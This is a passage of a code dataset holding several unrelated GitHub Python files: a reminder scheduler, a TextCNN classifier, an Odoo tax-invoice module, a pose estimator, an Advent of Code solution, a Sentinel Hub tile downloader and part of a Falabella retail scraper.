job_corn_dict['day']\n update_dict = {'hour': '*/' + str(hour_interval)}\n elif REPEAT_KEY_MINUTE in self.job_repeat:\n min_interval = self.job_repeat.get(REPEAT_KEY_MINUTE)\n del job_corn_dict['year']\n del job_corn_dict['month']\n del job_corn_dict['day']\n del job_corn_dict['hour']\n update_dict = {'minute': '*/' + str(min_interval)}\n job_corn_dict.update(update_dict)\n self.job_corn = job_corn_dict\n self.trigger_repeat = TRIGGER_CRON\n\n\nif __name__ == '__main__':\n scheduler.start()\n RemindScheduler().add_job(0, '2019-12-13 10:59:00', {'seconds': 2}, 'hahaha', 'user_wxid', 'user_say')\n while True:\n pass\n","repo_name":"tangwenfei123/AlarmRobot","sub_path":"schedule/RemindScheduler.py","file_name":"RemindScheduler.py","file_ext":"py","file_size_in_byte":6876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"69"}
+{"seq_id":"74292119261","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass TextCNN(nn.Module):\n def __init__(self):\n super(TextCNN,self).__init__()\n\n class_num = 8\n embedding_dim = 100\n ci = 1\n kernel_num = 25\n # kernel_sizes = [3,4,5]\n # self.convs = nn.ModuleList([nn.Conv2d(ci,kernel_num,(k,embedding_dim/2))for k in kernel_sizes])\n # #含义说明:nn.Conv2d(ci,kernel_num,(k,embedding_dim))\n # #ci就是输入的通道数目,是要和数据对的上的;kernel_num这里的意思就是输出通道数目;(k,embedding_dim)卷积核的形状,也���是2维度的k*embedding_dim\n # #nn.Conv2d(ci,cj,k)这里的K就是表示卷积核的形状是正方形的,k*k\n\n self.conv1 = nn.Conv2d(ci, kernel_num, (3, int(embedding_dim))) #这里一定要输入4维向量[B,C,L,D]\n self.conv2 = nn.Conv2d(ci, kernel_num, (5, int(embedding_dim)))\n self.conv3 = nn.Conv2d(ci, kernel_num, (7, int(embedding_dim)))\n self.conv4 = nn.Conv2d(ci, kernel_num, (9, int(embedding_dim)))\n\n self.dropout = nn.Dropout(0.5)#丢掉10%\n self.classificer = nn.Linear(kernel_num*4,class_num)\n\n def conv_and_pool(self, x, conv):\n #(B, Ci, L, D)\n x = F.relu(conv(x))#(B,kernel_num,L-3+1,D-D+1)\n x = x.squeeze(3)# (B, kernel_num, L-3+1)\n x = F.max_pool1d(x, x.size(2))#(B, kernel_num,1)\n x = x.squeeze(2)# (B,kernel_num) squeeze压缩维度\n return x\n\n def forward(self,x):\n #size(B,L,D)\n x = x.unsqueeze(1) #(B, Ci, L, D)#unsqueeze增加维度\n\n x1 = self.conv_and_pool(x, self.conv1) # (B,kernel_num)\n x2 = self.conv_and_pool(x, self.conv2) # (B,kernel_num)\n x3 = self.conv_and_pool(x, self.conv3) # (B,kernel_num)\n x4 = self.conv_and_pool(x, self.conv4) # (B,kernel_num)\n\n x = torch.cat((x1, x2, x3,x4), 1) # (B,len(Ks)*kernel_num)\n x = self.dropout(x) # (B, len(Ks)*kernel_num)\n logit = self.classificer(x) # (B, C)\n return logit\n\n\n\n\n","repo_name":"HUSTHY/classificationTask","sub_path":"pytorch/TextCNN/model/TextCNN.py","file_name":"TextCNN.py","file_ext":"py","file_size_in_byte":2056,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"69"}
+{"seq_id":"31732210188","text":"from odoo import api, fields, models, tools\n\n\nclass AccountMove(models.Model):\n _inherit = \"account.move\"\n\n sii_dua_invoice = fields.Boolean(\"SII DUA Invoice\", compute=\"_compute_dua_invoice\")\n\n @api.model\n @tools.ormcache(\"company\")\n def _get_dua_fiscal_position_id(self, company):\n fp = self.env.ref(\n \"l10n_es_dua.%i_fp_dua\" % company.id, raise_if_not_found=False\n )\n return (\n fp\n and fp.id\n or self.env[\"account.fiscal.position\"]\n .search(\n [\n (\"name\", \"=\", \"Importación con DUA\"),\n (\"company_id\", \"=\", company.id),\n ],\n limit=1,\n )\n .id\n )\n\n @api.depends(\"company_id\", \"fiscal_position_id\", \"invoice_line_ids.tax_ids\")\n def _compute_dua_invoice(self):\n for invoice in self:\n taxes = invoice._get_sii_taxes_map(\n [\"DUA\"], self._get_document_fiscal_date()\n )\n invoice.sii_dua_invoice = invoice.invoice_line_ids.filtered(\n lambda x: any([tax in taxes for tax in x.tax_ids])\n )\n\n @api.depends(\"sii_dua_invoice\", \"fiscal_position_id\")\n def _compute_sii_enabled(self):\n \"\"\"Don't sent secondary DUA invoices to SII.\"\"\"\n res = super()._compute_sii_enabled()\n for invoice in self.filtered(\"sii_enabled\"):\n dua_fiscal_position_id = self._get_dua_fiscal_position_id(\n invoice.company_id\n )\n if (\n dua_fiscal_position_id\n and invoice.fiscal_position_id.id == dua_fiscal_position_id\n and not invoice.sii_dua_invoice\n ):\n invoice.sii_enabled = False\n return res\n\n def _get_sii_invoice_dict_in(self, cancel=False):\n \"\"\"Según la documentación de la AEAT, la operación de importación se\n registra con TipoFactura = F5, sin FechaOperacion y con el NIF de la\n propia compañia en IDEmisorFactura y Contraparte\n Más información en: 8.1.2.2. Ejemplo mensaje XML de alta de importación\n en el documento de descripción de los servicios web.\n\n En el caso de una factura (con la casilla LC activa) que complemente a una\n factura DUA se debe mantener el TipoFactura = LC. Puntos 4.24 y 4.25 de este pdf:\n https://www.agenciatributaria.es/static_files/AEAT/Contenidos_Comunes/La_Agencia_Tributaria/Modelos_y_formularios/Suministro_inmediato_informacion/V_1_1/Faqs_General/FAQs11_11_2020.pdf # noqa\n \"\"\"\n res = super()._get_sii_invoice_dict_in(cancel=cancel)\n if res.get(\"FacturaRecibida\") and self.sii_dua_invoice:\n if not self.sii_lc_operation:\n res[\"FacturaRecibida\"][\"TipoFactura\"] = \"F5\"\n res[\"FacturaRecibida\"].pop(\"FechaOperacion\", None)\n nif = self.company_id.partner_id._parse_aeat_vat_info()[2]\n res[\"FacturaRecibida\"][\"IDEmisorFactura\"] = {\"NIF\": nif}\n res[\"IDFactura\"][\"IDEmisorFactura\"] = {\"NIF\": nif}\n res[\"FacturaRecibida\"][\"Contraparte\"][\"NIF\"] = nif\n res[\"FacturaRecibida\"][\"Contraparte\"][\"NombreRazon\"] = self.company_id.name\n res[\"FacturaRecibida\"].pop(\"ImporteTotal\", False)\n return res\n","repo_name":"OCA/l10n-spain","sub_path":"l10n_es_dua_sii/models/account_move.py","file_name":"account_move.py","file_ext":"py","file_size_in_byte":3327,"program_lang":"python","lang":"es","doc_type":"code","stars":203,"dataset":"github-code","pt":"69"}
+{"seq_id":"15771469033","text":"import cv2 as cv\r\nimport mediapipe as mp\r\n\r\n\"\"\"cap = cv.VideoCapture(0)\r\n\r\nmpPose = mp.solutions.pose\r\npose = mpPose.Pose()\r\nmyDraw = mp.solutions.drawing_utils\r\nwhile True:\r\n _,frame=cap.read()\r\n imgRBG = cv.cvtColor(frame,cv.COLOR_BGR2RGB)\r\n results = pose.process(imgRBG)\r\n\r\n if results.pose_landmarks:\r\n myDraw.draw_landmarks(frame,results.pose_landmarks,mpPose.POSE_CONNECTIONS)\r\n\r\n cv.imshow(\"Test\", frame)\r\n k = cv.waitKey(1)\r\n if k == ord(\"q\"):\r\n break\r\n\r\ncap.release()\r\ncv.destroyAllWindows()\"\"\"\r\nclass position():\r\n def __init__(self):\r\n self.mpPose = mp.solutions.pose\r\n self.pose = self.mpPose.Pose()\r\n self.myDraw = mp.solutions.drawing_utils\r\n\r\n def findBody(self,frame,draw=True):\r\n imgRBG = cv.cvtColor(frame, cv.COLOR_BGR2RGB)\r\n self.results = self.pose.process(imgRBG)\r\n\r\n if self.results.pose_landmarks:\r\n self.myDraw.draw_landmarks(frame, self.results.pose_landmarks, self.mpPose.POSE_CONNECTIONS)\r\n return frame\r\n\r\n def findpostion(self,frame,handNo=0,draw= True):\r\n\r\n lmlist = []\r\n\r\n if self.results.pose_landmarks:\r\n for id , ln in enumerate(self.results.pose_landmarks.landmark):\r\n h,w,c = frame.shape\r\n cx,cy =int(ln.x*w), int(ln.y*h)\r\n lmlist.append([id,cx,cy])\r\n if draw:\r\n cv.circle(frame,(cx,cy),5,(255,0,255),cv.FILLED)\r\n return lmlist\r\n\r\ndef main():\r\n cap = cv.VideoCapture(0)\r\n position_obj = position()\r\n\r\n while True:\r\n _, frame = cap.read()\r\n frame = position_obj.findBody(frame)\r\n lmlist = position_obj.findpostion(frame,draw=False)\r\n if len(lmlist) !=0:\r\n print(lmlist[14])\r\n cv.circle(frame,(lmlist[14][1],lmlist[14][2]), 15, (0, 0, 255), cv.FILLED)\r\n cv.imshow(\"Test\", frame)\r\n k = cv.waitKey(1)\r\n if k == ord(\"q\"):\r\n break\r\n\r\n cap.release()\r\n cv.destroyAllWindows()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"Jagathratchakan/Open-Cv","sub_path":"pose_estimation.py","file_name":"pose_estimation.py","file_ext":"py","file_size_in_byte":2063,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"69"}
+{"seq_id":"36063190888","text":"from time import time\nfrom statistics import mode\n\nstart = time()\n\nwith open(\"day03input.txt\", \"r\") as file_in:\n diag = [x for x in file_in.read().rstrip().split(\"\\n\")]\n\n# print(diag)\n\n\ndef part_one():\n positions = dict()\n for number in diag:\n for pos in range(len(number)):\n if pos in positions.keys():\n positions[pos].append(number[pos])\n else:\n positions[pos] = [number[pos]]\n # print(positions)\n gamma_lst = []\n epsilon_lst = []\n for pos in positions.keys():\n pos_mode = mode(positions[pos])\n gamma_lst.append(pos_mode)\n epsilon_lst.append(str(abs(int(pos_mode)-1)))\n gamma = int(''.join(gamma_lst), 2)\n epsilon = int(''.join(epsilon_lst), 2)\n return gamma * epsilon\n\n\ndef part_two():\n oxygen = diag\n co2 = diag\n for pos in range(len(diag[0])):\n oxy_count = 0\n for number in oxygen:\n oxy_count += int(number[pos])\n co2_count = 0\n for number in co2:\n co2_count += int(number[pos])\n if oxy_count >= len(oxygen)/2:\n oxy_mode = 1\n else:\n oxy_mode = 0\n if co2_count < len(co2)/2:\n co2_antimode = 1\n else:\n co2_antimode = 0\n new_oxygen = list()\n for number in oxygen:\n if len(oxygen) == 1:\n new_oxygen.append(number)\n break\n if int(number[pos]) == oxy_mode:\n new_oxygen.append(number)\n oxygen = new_oxygen\n new_co2 = list()\n for number in co2:\n if len(co2) == 1:\n new_co2.append(number)\n break\n if int(number[pos]) == co2_antimode:\n new_co2.append(number)\n co2 = new_co2\n # print(oxygen, co2)\n return int(''.join(oxygen[0]), 2) * int(''.join(co2[0]), 2)\n\n\nprint(part_one())\n\nprint(part_two())\n\nprint(\"computed in \" + str(time() - start) + \" seconds\")\n","repo_name":"waal42/AdventOfCode","sub_path":"2021/day03.py","file_name":"day03.py","file_ext":"py","file_size_in_byte":1976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"26016153920","text":"import json\nfrom math import ceil\nimport os\nfrom typing import Dict, List, Tuple\n\nimport numpy as np\nfrom shapely.geometry import Polygon\nfrom sentinelhub import (\n SHConfig,\n bbox_to_dimensions,\n CRS,\n BBox,\n BBoxSplitter,\n SentinelHubRequest,\n DataCollection,\n MimeType,\n)\n\nfrom config.default import CfgNode\n\n\ndef get_sentinelhub_config(config_file: str) -> SHConfig:\n \"\"\"Loads sentinel hub config from file and returns it\"\"\"\n config = SHConfig()\n\n with open(config_file, \"r\") as f:\n config_vals = json.load(f)\n\n config.instance_id = config_vals[\"instance_id\"]\n config.sh_client_id = config_vals[\"sh_client_id\"]\n config.sh_client_secret = config_vals[\"sh_client_secret\"]\n\n return config\n\n\ndef get_total_size(polygon: Polygon, resolution: float) -> Tuple[float]:\n \"\"\"Returns the total size of the polygon in pixels given resolution\n\n Args:\n polygon (Polygon): The polygon to get the size of\n resolution (float): The resolution of the image (in meters)\n\n Returns:\n Tuple[float]: Size of the polygon in pixels\n \"\"\"\n splitter = BBoxSplitter(\n [polygon], CRS.WGS84, split_shape=[1, 1], reduce_bbox_sizes=True\n )\n cropped_tile = splitter.get_bbox_list()[0]\n size = bbox_to_dimensions(cropped_tile, resolution=resolution)\n return size\n\n\ndef get_tiles_coord(\n lat: Tuple[float],\n long: Tuple[float],\n resolution: float,\n upper_size_margin: int = 2400,\n) -> List[BBox]:\n \"\"\"Given lattitude, longitude, resolution and upper limit for a polygon,\n returns a list of coordinates into which the polygon should be divided into\n\n Args:\n lat (Tuple[float]): The lattitude of the polygon [south, north]\n long (Tuple[float]): The longitude of the polygon [west, east]\n resolution (float): The resolution of the image (in meters)\n upper_size_margin (int, optional): Upper margin for tile size.\n Defined by API download limitation.\n Defaults to 2400.\n\n Returns:\n List[BBox]: List of BBoxes which correspond to tiles to which polygon is divided\n Coordinates in BBox are in format ((west, south),(east, north))\n \"\"\"\n whole_rectangle = Polygon(\n [[long[0], lat[0]], [long[1], lat[0]], [long[1], lat[1]], [long[0], lat[1]]]\n )\n whole_size = get_total_size(whole_rectangle, resolution)\n osm_splitter = BBoxSplitter(\n [whole_rectangle],\n CRS.WGS84,\n split_shape=[\n ceil(whole_size[0] / upper_size_margin),\n ceil(whole_size[1] / upper_size_margin),\n ],\n )\n\n cropped_tiles = osm_splitter.get_bbox_list()\n\n return cropped_tiles\n\n\ndef get_eval_script(bands: List[str]) -> str:\n \"\"\"Generates API download scipt given list of bands\n according to https://sentinelhub-py.readthedocs.io/en/latest/examples/\n ogc_request.html?highlight=evalscript#Example-11:-Evalscript\"\"\"\n bands_len = len(bands)\n return_string = (\",\\n \").join(\n [f\"sample.{band}\" for band in bands]\n )\n evalscript = \"\"\"\n //VERSION=3\n function setup() {\n return {\n input: [{\n bands:\"\"\"\n\n evalscript += f\"\"\" [{\", \".join([f'\"{band}\"' for band in bands])}],\"\"\"\n\n evalscript += \"\"\"\n units: \"DN\"\n }],\n output: {\"\"\"\n\n evalscript += f\"\"\"\n bands: {bands_len},\"\"\"\n\n evalscript += \"\"\"\n sampleType: \"INT16\"\n }\n };\n }\n\n function evaluatePixel(sample) {\n return [\"\"\"\n\n evalscript += f\"\"\"{return_string}\"\"\"\n\n evalscript += \"\"\"];\n }\n \"\"\"\n\n return evalscript\n\n\ndef get_used_bands_list(config: CfgNode) -> List[str]:\n \"\"\"Returns list of bands required for the model\"\"\"\n all_bands = config.DATASET.INPUT.CHANNELS\n max_band = max(config.DATASET.INPUT.USED_CHANNELS)\n return all_bands[: max_band + 1]\n\n\ndef get_date_range(year: int, season_id: int) -> Tuple[str]:\n \"\"\"Returns start and end date of the season\n\n Args:\n year (int): The year of the season\n season_id (int): The season id\n\n Raises:\n ValueError: If season_id is not in range [1, 4]\n\n Returns:\n Tuple[str]: Start and end date of the season\n \"\"\"\n if season_id == 1:\n return f\"{year}-JAN-01\", f\"{year}-MAR-30\"\n elif season_id == 2:\n return f\"{year}-APR-01\", f\"{year}-JUN-30\"\n elif season_id == 3:\n return f\"{year}-JUL-01\", f\"{year}-SEP-30\"\n elif season_id == 4:\n return f\"{year}-OCT-01\", f\"{year}-DEC-31\"\n else:\n raise ValueError(\"Season id is not valid\")\n\n\ndef download_raster(\n tile_coord: Tuple[float], config: CfgNode, year: int, season: int\n) -> np.array:\n \"\"\"Given tile coordinates and resolution, downloads the tile using sentinelhub API\n\n Args:\n tile_coord (Tuple[float]): The coordinates of the tile\n resolution (float): The resolution of the image (in meters)\n year (int): The year of the season\n season (int): The season id\n\n Returns:\n np.array: The downloaded tile with shape (h, w, bands)\n \"\"\"\n\n used_bands = get_used_bands_list(config)\n eval_script = get_eval_script(used_bands)\n\n cred_config = get_sentinelhub_config(config.SENTINEL_HUB.CONFIG)\n\n start_date, end_date = get_date_range(year, season)\n\n request_all_bands = SentinelHubRequest(\n evalscript=eval_script,\n input_data=[\n SentinelHubRequest.input_data(\n data_collection=DataCollection.SENTINEL2_L1C,\n time_interval=(\n start_date,\n end_date,\n ),\n mosaicking_order=\"leastCC\",\n )\n ],\n responses=[SentinelHubRequest.output_response(\"default\", MimeType.TIFF)],\n bbox=tile_coord,\n size=bbox_to_dimensions(tile_coord, config.SENTINEL_HUB.RESOLUTION),\n config=cred_config,\n )\n\n downloaded_img = request_all_bands.get_data()[0]\n return downloaded_img\n\n\ndef get_raster_from_coord(\n lat: Tuple[float],\n long: Tuple[float],\n config: CfgNode,\n savedir: str,\n year: int,\n season: int,\n) -> Dict[str, Tuple[float]]:\n \"\"\"Given lattitude, longitude of a polygon and resolution of target tiles,\n divides polygon into tiles, downloads them and save on disk\n\n Args:\n lat (Tuple[float]): The lattitude of the polygon [south, north]\n long (Tuple[float]): The longitude of the polygon [west, east]\n resolution (float): The resolution of the image (in meters)\n savedir (str): The directory to save the downloaded tiles\n year (int): The year of the season\n season (int): The season id\n\n\n Returns:\n Dict[str, Tuple[float]]: [description]\n \"\"\"\n # Divide the lat and long into the appropriate number of tiles\n tiles = get_tiles_coord(lat, long, resolution=config.SENTINEL_HUB.RESOLUTION)\n\n # Get all rasters and save them\n os.makedirs(savedir, exist_ok=True)\n coords = {savedir: (lat, long)}\n for i, tile in enumerate(tiles):\n img = download_raster(tile, config, year, season)\n filename = f\"tile_{i}\"\n filepath = os.path.join(savedir, filename)\n np.save(filepath, img)\n tile_bounds = tile.geometry.bounds\n tile_coord = {\n \"lat\": [tile_bounds[1], tile_bounds[3]],\n \"long\": [tile_bounds[0], tile_bounds[2]],\n }\n coords[filepath + \".png\"] = tile_coord\n\n return coords\n","repo_name":"mintusf/land_cover_tracking","sub_path":"utils/sentinel_api.py","file_name":"sentinel_api.py","file_ext":"py","file_size_in_byte":7797,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"69"}
+{"seq_id":"7210353044","text":"import json\nimport logging\nimport random\nimport re\nimport urllib\n\nimport time\n\nfrom collections import defaultdict\nfrom decimal import Decimal\n\nimport validators\nfrom bs4 import BeautifulSoup\nfrom html import unescape\n\nfrom dateutil.parser import parse\nfrom requests import TooManyRedirects\n\nfrom storescraper.categories import *\nfrom storescraper.product import Product\nfrom storescraper.store import Store\nfrom storescraper.utils import remove_words, session_with_proxy, \\\n CF_REQUEST_HEADERS, html_to_markdown\nfrom storescraper import banner_sections as bs\n\n\nclass Falabella(Store):\n preferred_discover_urls_concurrency = 3\n preferred_products_for_url_concurrency = 20\n store_and_subdomain = None\n seller = [\n ('FALABELLA', 'RETAIL'),\n (None, 'GRUPO')\n ]\n seller_blacklist = ['SODIMAC', 'TOTTUS']\n\n zones = 'PCL2281,ZL_CERRILLOS,PCL1135,3045,PCL1486,FALABELLA_FBY_SDD,' \\\n 'PCL2269,LOSC,PCL540,2020,PCL1186,FEDEX_RM_URB,PCL2520,PCL1336,' \\\n 'CHILEXPRESS_8,PCL1839,BX_R13_BASE,PCL226,SCD9039_FLEX,PCL105,' \\\n 'HUB_SALIDA_DIRECTA_RM,PCL2120,PCL1923,PCL2441,1234,PCL1223,' \\\n 'FBY_BT_CTT,PCL2661,130617,PCL25,PCL2442,BLUE_RM_URBANO,PCL115,' \\\n 'RM,PCL94,PCL2511,PCL108,13,PCL861,CHILE_INTERNATIONAL,PCL1364,' \\\n 'PCL109,PCL184'\n\n category_paths = [\n ['cat720161', [CELL], 'Home > Tecnología-Telefonía > Celulares y Teléf'\n 'onos > Smartphones', 1],\n ['cat1280018', [CELL], 'Home > Tecnología-Telefonía > Celulares y Telé'\n 'fonos > Celulares Básicos', 1],\n ['cat1640002', [HEADPHONES], 'Home > Tecnología-Audio > Audífonos', 1],\n ['cat70037', [MEMORY_CARD], 'Home > Tecnología-Telefonía > Accesorios '\n 'Celulares > Tarjetas de Memoria', 1],\n ['cat4290064', [WEARABLE], 'Home > Tecnología-Wearables > Smartband',\n 1],\n ['cat4290063', [WEARABLE], 'Home > Tecnología-Wearables > SmartWatch',\n 1],\n ['cat429001', [WEARABLE], 'Home > Tecnología-Wearables > SmartWatch In'\n 'fantil', 1],\n ['cat1012', [TELEVISION], 'Home > Tecnología-TV y Video', 0],\n ['cat7190148', [TELEVISION], 'Home > Tecnología-TV > Smart TV', 1],\n ['cat7190148',\n [TELEVISION],\n 'Home > Tecnología-TV > Smart tv entre 50\" - 55\"', 1,\n {'f.variant.custom.Tamaño_de_la_pantalla': '50::55'}],\n ['cat7190148',\n [TELEVISION],\n 'Home > Tecnología-TV > Smart tv sobre 55\"', 1,\n {'f.variant.custom.Tamaño_de_la_pantalla':\n '58::60::65::68::70::75::77::85::86'}],\n ['cat7190148',\n [TELEVISION],\n 'Home > Tecnología-TV > Smart tv menores a 50\"', 1,\n {\n 'f.variant.custom.Tamaño_de_la_pantalla':\n '1::20::24::32::39::40::42::43::48'}],\n ['cat2070', [PROJECTOR], 'Home > Tecnología-TV > Proyectores', 1],\n ['cat2005', [STEREO_SYSTEM], 'Home > Tecnología-Audio', 0],\n ['cat3091', [STEREO_SYSTEM], 'Home > Tecnología-Audio > Equipos de Mús'\n 'ica y Karaokes', 1],\n ['cat3203', [STEREO_SYSTEM], 'Home > Tecnología-Audio > Hi-Fi', 1],\n ['cat3171', [STEREO_SYSTEM], 'Home > Tecnología-Audio > Parlantes Blue'\n 'tooth', 1],\n ['cat2045', [STEREO_SYSTEM], 'Home > Tecnología-Audio > Soundbar y Hom'\n 'e Theater', 1],\n ['cat3155', [MOUSE], 'Home > Tecnología-Computadores > Accesorios Comp'\n 'utación > Mouse', 1],\n ['cat2370002', [KEYBOARD], 'Home > Tecnología-Computadores > Accesorio'\n 's Computación > Teclados', 1],\n ['cat3239', [STEREO_SYSTEM], 'Home > Tecnología-Computadores > Accesor'\n 'ios Computación > Parlantes y Subwoofer', 1],\n ['CATG11879', [VIDEO_CARD], 'Home > Tecnología-Computadores > Accesori'\n 'os Computación > Tarjetas de Video', 1],\n ['cat40051', [ALL_IN_ONE], 'Home > Tecnología-Computadores > All in on'\n 'e', 1],\n ['cat3087', [EXTERNAL_STORAGE_DRIVE], 'Home > Tecnología-Computadores '\n '> Almacenamiento > Discos duros', 1],\n ['cat3177', [USB_FLASH_DRIVE], 'Home > Tecnología-Computación > Almace'\n 'namiento > Pendrives', 1],\n ['cat1820006', [PRINTER], 'Home > Tecnología-Computadores > Impresoras'\n ' y Tintas > Impresoras Multifuncionales', 1],\n ['cat1820004', [PRINTER], 'Home > Tecnología-Computadores > Impresoras'\n ' y Tintas > Impresoras', 1],\n ['cat6680042', [PRINTER], 'Home > Tecnología-Computadores > Impresoras'\n ' y Tintas > Impresoras Tradicionales', 1],\n ['cat11970007', [PRINTER], 'Home > Tecnología-Computadores > Impresora'\n 's y Tintas > Impresoras Láser', 1],\n ['cat2062', [MONITOR], 'Home > Tecnología-Computadores > Monitores',\n 1],\n ['cat70057', [NOTEBOOK], 'Home > Tecnología-Computadores > Notebooks',\n 1],\n ['cat7230007', [TABLET], 'Home > Tecnología-Computadores > Tablets',\n 1],\n ['cat4930009', [HEADPHONES], 'Home > Tecnología-Computadores > Accesor'\n 'ios gamer > Audífonos gamer', 1],\n ['CATG19011', [GAMING_CHAIR], 'Home > Tecnología-Computadores > Acceso'\n 'rios gamer > Sillas gamer', 1],\n ['CATG19012', [COMPUTER_CASE], 'Home > Tecnología-Computadores > Acces'\n 'orios gamer > Gabinete gamer', 1],\n ['CATG19008', [KEYBOARD], 'Home > Tecnología-Computadores > Accesorios'\n ' gamer > Tecaldos gamer', 1],\n ['CATG19007', [MOUSE], 'Home > Tecnología-Computadores > Accesorios ga'\n 'mer > Mouse gamer', 1],\n ['cat202303', [VIDEO_GAME_CONSOLE], 'Home > Tecnología-Videojuegos > C'\n 'onsolas', 1],\n ['cat3114', [OVEN], 'Home > Electrohogar-Electrodomésticos Cocina > Ho'\n 'rnos Eléctricos', 1],\n ['cat3151', [OVEN], 'Home > Electrohogar-Electrodomésticos Cocina > Mi'\n 'croondas', 1],\n ['cat3136', [WASHING_MACHINE], 'Home > Electrohogar-Línea blanca > Lav'\n 'ado', 1],\n ['cat4060', [WASHING_MACHINE], 'Home > Electrohogar-Línea blanca > Lav'\n 'ado > Lavadoras', 1],\n ['cat1700002', [WASHING_MACHINE], 'Home > Electrohogar-Línea blanca > '\n 'Lavado > Lavadoras-Secadoras', 1],\n ['cat4088', [WASHING_MACHINE], 'Home > Electrohogar-Línea blanca > Lav'\n 'ado > Secadoras', 1],\n ['cat4061', [DISH_WASHER], 'Home > Electrohogar-Línea blanca > Lavado '\n '> Lavavajillas', 1],\n ['cat3205', [REFRIGERATOR], 'Home > Electrohogar-Línea Blanca > Refrig'\n 'eración > Refrigeradores', 1],\n ['cat4091', [REFRIGERATOR], 'Home > Electrohogar-Línea Blanca > Refrig'\n 'eración > Refrigeradores > '\n 'Side by side', 1],\n ['cat4054', [OVEN], 'Home > Electrohogar-Línea blanca > Cocina > Horno'\n 's Empotrables', 1],\n ['cat2019', [AIR_CONDITIONER], 'Home > Electrohogar-Climatización > Ai'\n 're acondicionado', 1],\n ['cat4850013', [NOTEBOOK], 'Home > Especiales-Otras categorias > PC ga'\n 'mer', 1],\n ['cat3025', [VACUUM_CLEANER], 'Home > Electrohogar-Aspirado y Limpieza'\n ' > Aspiradoras', 1],\n ['cat70028', [CAMERA], 'Home > Tecnología-Fotografía > Cámaras Compact'\n 'as', 1],\n ['cat70029', [CAMERA], 'Home > Tecnología-Fotografía > Cámaras Semipro'\n 'fesionales', 1],\n ['cat1130010', [STEREO_SYSTEM], 'Home > Tecnología-Audio > Tornamesas',\n 1],\n ['cat9900007', [SPACE_HEATER], 'Home > Electrohogar-Calefacción > Cale'\n 'facción > Estufas Parafina Láser', 1],\n ['cat9910024', [SPACE_HEATER], 'Home > Electrohogar-Calefacción > Cale'\n 'facción > Estufas Gas', 1],\n ['cat9910006', [SPACE_HEATER], 'Home > Electrohogar-Calefacción > Cale'\n 'facción > Estufas Eléctricas', 1],\n ['cat9910027', [SPACE_HEATER], 'Home > Electrohogar-Calefacción > Cale'\n 'facción > Estufas Pellet y Leña', 1],\n # ['CATG10194', [GROCERIES], 'Despensa', 1]\n ]\n\n @classmethod\n def categories(cls):\n cats = []\n for entry in cls.category_paths:\n for cat in entry[1]:\n if cat not in cats:\n cats.append(cat)\n\n return cats\n\n @classmethod\n def discover_entries_for_category(cls, category, extra_args=None):\n category_paths = cls.category_paths\n session = session_with_proxy(extra_args)\n session.headers['User-Agent'] = CF_REQUEST_HEADERS['User-Agent']\n product_entries = defaultdict(lambda: [])\n\n for e in category_paths:\n category_id, local_categories, section_name, \\\n category_weight = e[:4]\n\n if len(e) == 5:\n extra_params = e[4]\n else:\n extra_params = {}\n\n if category not in local_categories:\n continue\n\n for seller_id, section_prefix in cls.seller:\n category_product_urls = cls._get_product_urls(\n session, category_id, extra_params, seller_id)\n\n if section_prefix:\n full_section_name = '{} > {}'.format(section_prefix,\n section_name)\n else:\n full_section_name = section_name\n\n for idx, url in enumerate(category_product_urls):\n product_entries[url].append({\n 'category_weight': category_weight,\n 'section_name': full_section_name,\n 'value': idx + 1\n })\n\n return product_entries\n\n @classmethod\n def discover_urls_for_keyword(cls, keyword, threshold, extra_args=None):\n session = session_with_proxy(extra_args)\n session.headers['User-Agent'] = CF_REQUEST_HEADERS['User-Agent']\n\n base_url = \"https://www.falabella.com/falabella-cl/search?\" \\\n \"Ntt={}&page={}\"\n\n discovered_urls = []\n page = 1\n while True:\n if page > 150:\n raise Exception('Page overflow ' + keyword)\n\n search_url = base_url.format(keyword, page)\n res = session.get(search_url, timeout=30)\n\n if res.status_code == 500:\n break\n\n soup = BeautifulSoup(res.text, 'html.parser')\n\n script = soup.find('script', {'id': '__NEXT_DATA__'})\n json_data = json.loads(script.text)\n\n if 'results' not in json_data['props']['pageProps']:\n break\n\n for product_data in json_data['props']['pageProps']['results']:\n product_url = product_data['url']\n discovered_urls.append(product_url)\n\n if len(discovered_urls) == threshold:\n return discovered_urls\n\n page += 1\n\n return discovered_urls\n\n @classmethod\n def products_for_url(cls, url, category=None, extra_args=None):\n print(url)\n extra_args = extra_args or {}\n session = session_with_proxy(extra_args)\n session.headers['User-Agent'] = CF_REQUEST_HEADERS['User-Agent']\n\n for i in range(3):\n try:\n response = session.get(url, timeout=30)\n except TooManyRedirects:\n return []\n except UnicodeDecodeError:\n return []\n\n if response.status_code in [404, 500]:\n return []\n\n if 'notFound' in response.url:\n return []\n\n content = response.text.replace('
', '')\n\n if 'NEXT_DATA' in content:\n print('OLD')\n return cls._products_for_url(\n url, content, session,\n category=category, extra_args=extra_args)\n else:\n raise Exception('Invalid product type')\n\n @classmethod\n def _get_product_urls(cls, session, category_id, extra_params, seller_id):\n discovered_urls = []\n # For some reason the \"categoryName\" param activates the sponsored\n # results\n base_url = 'https://www.falabella.com/s/browse/v1/listing/cl?' \\\n '&categoryId={}&categoryName=foo&sortBy={}&page={}'\n\n for key, value in extra_params.items():\n base_url += '&{}={}'.format(key, urllib.parse.quote(value))\n\n base_url += '&zones={}'.format(urllib.parse.quote(cls.zones))\n\n # The first sorting will be given preference for\n # section position information\n\n sortings = [\n '_score%2Cdesc',\n 'derived.price.search%2Casc',\n 'product.brandName%2Casc',\n 'product.attribute.newIconExpiryDate%2Cdesc',\n 'product.averageOverallRating%2Cdesc'\n ]\n\n for idx, sorting in enumerate(sortings):\n page = 1\n\n while True:\n if page > 210:\n raise Exception('Page overflow: ' + category_id)\n\n pag_url = base_url.format(category_id, sorting,\n page)\n\n if cls.store_and_subdomain:\n pag_url += '&subdomain={}&store={}'.format(\n cls.store_and_subdomain, cls.store_and_subdomain)\n\n if seller_id:\n pag_url += '&f.derived.variant.sellerId={}'.format(\n seller_id)\n\n print(pag_url)\n\n res = cls.retrieve_json_page(session, pag_url)\n\n if 'results' not in res or not res['results']:\n if page == 1:\n logging.warning(\n 'Empty category: 